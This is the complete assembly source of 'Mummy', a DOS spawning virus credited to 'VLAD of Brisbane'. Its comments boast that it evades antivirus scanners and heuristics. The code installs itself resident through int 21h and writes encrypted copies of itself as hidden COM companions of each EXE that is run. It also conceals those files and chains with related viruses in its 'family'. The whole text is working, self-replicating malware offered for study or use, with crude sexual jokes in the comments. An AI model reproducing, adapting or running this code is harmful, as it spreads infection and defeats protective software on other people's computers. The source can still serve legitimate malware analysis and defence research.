; This is the last virus in the Incest Family. Say hello to 'Mummy'! ; She's called Mummy because she spawns... ; Mummy is a virus written completely on my own without seeing another ; spawning virus. It contains a number of unique features (I think!) ; When the virus is in memory, TBScan can't find any of the spawnings! ; It doesn't even open them up to look inside! In fact I think that while ; the virus is resident that NO scanner will be able to find it... even when ; the signature finally comes out! ; All heuristics pass straight over the top... so booting clean won't affect ; anything unless the person running the scanner is really on the mark and ; watching for double names. ; Anyway this is a new form of stealth (only useful for spawning virii ; though...) Have a look! It's very simple! ; Mummy is a TSR, spawning EXE infector. It creates hidden COM files with ; the same name as a corresponding EXE file. It traps the loading of ; executables and infects them (infection is loosely termed here). ; The virus is completely harmless and is AT MOST a nuisance. To disinfect ; just delete the files. ; Complied using the a86 assembler. ; Note for Americans : 'Mum' = 'Mom' in most english speaking countries. start: mov word ptr quit,20cdh quit: ;Kill TBScan, FProt, TBClean and Debug mov word ptr quit,06c7h ;Restore the bytes. mov si,offset enc_start call encrypt enc_start: mov word ptr cs:psp,es ;Setup comline. mov ah,4ah ;Resize memory block so we mov bx,50 ;have enough memory to execute int 21h ;the infected program. mov ax,word ptr ds:[2ch] ;Environment segment. mov ds,ax ;DS = environment. xor si,si scan: inc si cmp byte ptr ds:si,0 ;Search for a zero. jne scan cmp byte ptr ds:[si+1],0 ;Double zero - end of envir. jne scan add si,4 ;Index to filename. mov dx,si scan2: inc si cmp byte ptr ds:si,'.' ;Look for end of .EXT jne scan2 mov word ptr ds:[si+1],'XE' ;Change to .EXE mov byte ptr ds:[si+3],'E' push dx ;Save filename offset ;Test for residency... mov ah,61h ;Mummy!!! mov di,'MU' mov bx,'M' int 21h cmp cx,'MU' ;Is Mummy home ? jne execute cmp dx,'M' jne execute mov cs:byte ptr resident,1 execute: pop dx mov ax,4b00h ;Execute the .EXE file! mov bx,offset parameter ;Parameter table. int 21h push cs pop ds cmp byte ptr resident,1 je normal_jend mov byte ptr resident,0 mov ax,3521h ;Get int 21h int 21h mov word ptr i21,bx ;Set int 21h to our virus. mov word ptr i21_2,bx mov word ptr i21+2,es mov word ptr i21_2+2,es mov ah,61h ;Lets have incest... mov di,'IN' int 21h cmp di,'NI' ;Is another family member ;home ? jne not_incest ;Yeh! Lets fuck! mov word ptr i21_2,cx ;The original interrupt mov word ptr i21_2+2,dx ;passes from the other virus ;to Mummy. ;Dont it feel good! not_incest: mov ax,2521h ;Point to our handler. mov dx,offset int_handler int 21h mov ax,3100h ;Mummy hops in bed. mov dx,80 ;Shes got lots of work to do! int 21h normal_jend: mov ax,4c00h ;Quit. int 21h ;data parameter dw 0 com_line dw 80h psp dw 0 db 0bh dup (0) ;Exec parameter table. Resident db 0 db '[Mummy Incest] by VLAD of Brisbane.',0 db 'Breed baby breed!' int_handler proc near cmp ah,4bh ;Execute instruction. jne test_other cmp byte ptr cs:flag,1 ;Was a residency test jne infect ;just used ? mov byte ptr cs:flag,0 jmp far_ret test_other: ;Residency check ;If residentcy test then pass back values and set flag=1 ;insert residency test here... cmp ah,61h jne hide_files cmp di,'MU' ;Testing for residency ? jne chk4incest cmp bx,'M' jne chk4incest mov cx,'MU' mov dx,'M' ;Return test parameters. mov byte ptr cs:flag,1 iret chk4incest: ;incest passing cmp di,'IN' ;More family fun! jne far_ret mov di,'NI' ;Put the interrupt out! mov cx,word ptr cs:[i21_2] mov dx,word ptr cs:[i21_2 + 2] ;Mummy is dominant! iret hide_files: cmp ah,4eh ;Findfirst jne outa_here and cx,0fffdh ;Remove 'hidden' attribute. outa_here: jmp far_ret ;Back to original interrupt. infect: push ax push bx push cx push dx ;Save everything. push es push ds push si push di mov si,dx ;Filename into SI test_dot: inc si cmp byte ptr ds:[si],'.' ;The '.' in '.EXE' jne test_dot inc si cmp word ptr ds:[si],'XE' ;EXE ? jne far_pop cmp byte ptr ds:[si+2],'E' jne far_pop ;Nope. mov word ptr ds:[si],'OC' ;Change it to its '.COM' mov byte ptr ds:[si+2],'M' ; counterpart. mov ah,3ch ;Create file. mov cx,2 ;Make it hidden. call int21h mov bx,ax ;File handle into BX push cs pop ds ;ES & DS = CS push cs pop es inc byte ptr encryptor ;Fix encryptor. jnz copy_virus inc byte ptr encryptor copy_virus: mov cx,length ;Virus length into CX mov si,100h ;Start of virus. mov di,offset finish ;Place to move virus to. rep movsb ;Move it! mov si,offset finish + 18 ;Start encrypting here. call encrypt ;Encrypt the sucker. mov ah,40h ;Mummy is having a baby! mov cx,length mov dx,offset finish call int21h mov ah,3eh ;Close file. call int21h far_pop: pop di pop si pop ds pop es pop dx ;Restore everything. pop cx pop bx pop ax far_ret: db 0eah ;Jumpf i21 dd 0 int21h proc near pushf ;opcode for callf db 9ah ;Callf i21_2 dd 0 ret int21h endp enc_end: ;Stop encrypting here. flag db 0 int_handler endp encrypt proc near ;Encrypt it. ;SI=start bit mov al,byte ptr cs:encryptor push cx mov cx,offset enc_end - offset enc_start enc_loop: xor byte ptr [si],al neg al rol al,1 ;Stuff around with AL. inc si loop enc_loop pop cx ret encrypt endp encryptor db 0 finish: length equ offset finish - 100h